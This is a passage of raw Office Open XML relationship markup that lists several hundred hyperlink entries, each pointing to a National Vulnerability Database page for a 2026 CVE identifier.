Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 